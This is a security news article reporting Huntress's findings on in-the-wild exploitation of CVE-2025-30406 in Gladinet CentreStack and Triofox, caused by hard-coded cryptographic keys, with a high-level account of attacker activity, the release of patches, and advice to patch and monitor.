In early April, Huntress, a leading cybersecurity firm, revealed the active exploitation of a critical vulnerability in Gladinet CentreStack and Triofox software. The flaw, identified as CVE-2025-30406, has led to significant attacks against several organizations, with roughly 120 endpoints showing suspicious activity.
The vulnerability stems from the use of default cryptographic configurations in Gladinet’s CentreStack and Triofox software. The presence of hard-coded cryptographic keys within the configuration files creates a security loophole, leaving servers vulnerable to remote code execution (RCE) attacks. This misconfiguration enables attackers to bypass ASPX ViewState protections, gain unauthorized access to servers, and execute malicious code, often with the ability to escalate to full system control.
Exploitation in the Wild: How Attackers Leverage CVE-2025-30406
The Huntress team discovered signs of exploitation in April 2025 when internal security detectors flagged unusual outbound connections originating from an irregular child process of the IIS worker process. The irregularity triggered a cascade of alerts, leading to a deeper investigation of the anomaly.
Huntress identified that attackers were using PowerShell commands to exploit the vulnerability. These commands allowed them to remotely execute code, leveraging the compromised server for further malicious activities. In one instance, Huntress traced a command sequence that involved an encoded PowerShell directive designed to download and execute a DLL file — a tactic seen in similar attacks on CrushFTP software vulnerabilities.
Risk Assessment: A Few Hundred Servers Exposed
While the total number of exposed servers is relatively small, Huntress reports that there are still a few hundred vulnerable servers visible on the public internet via Shodan. Despite this limited exposure, the potential for significant damage is high. Attackers can exploit the flaw to infiltrate networks and move laterally, potentially compromising sensitive systems and data.
Once the initial attack vector was executed, Huntress observed that the threat actors continued to move laterally within the affected networks. They used tools like MeshCentral to maintain remote access and attempted to add new user accounts and execute enumeration commands. They deployed default Impacket scripts, which are often used in post-exploitation activities, to further extend their control over compromised systems.
Patches Released: Gladinet Takes Action to Mitigate the Flaw
Gladinet has responded to the vulnerability by releasing patches to fix the critical issue. Huntress confirmed that the patches were effective in halting exploitation based on their proof-of-concept tests. The patches aim to close the cryptographic configuration gap that had exposed Gladinet’s software to exploitation.
The Urgent Need for Patching and Vigilance
The exploitation of CVE-2025-30406 highlights the importance of timely patching and secure configuration management in software applications. Organizations using Gladinet CentreStack or Triofox are urged to apply the latest patches immediately to mitigate the risk of remote code execution. Additionally, businesses should review their security practices and ensure they have proactive measures in place to detect and respond to zero-day exploits.
As this case demonstrates, attackers often follow established playbooks when exploiting vulnerabilities. Organizations should stay vigilant and continually monitor their systems for abnormal activities, especially when dealing with software that relies on external file transfer platforms. Enhanced monitoring solutions, such as intrusion detection systems (IDS), can help in detecting the early stages of exploitation and minimizing the impact of such attacks.
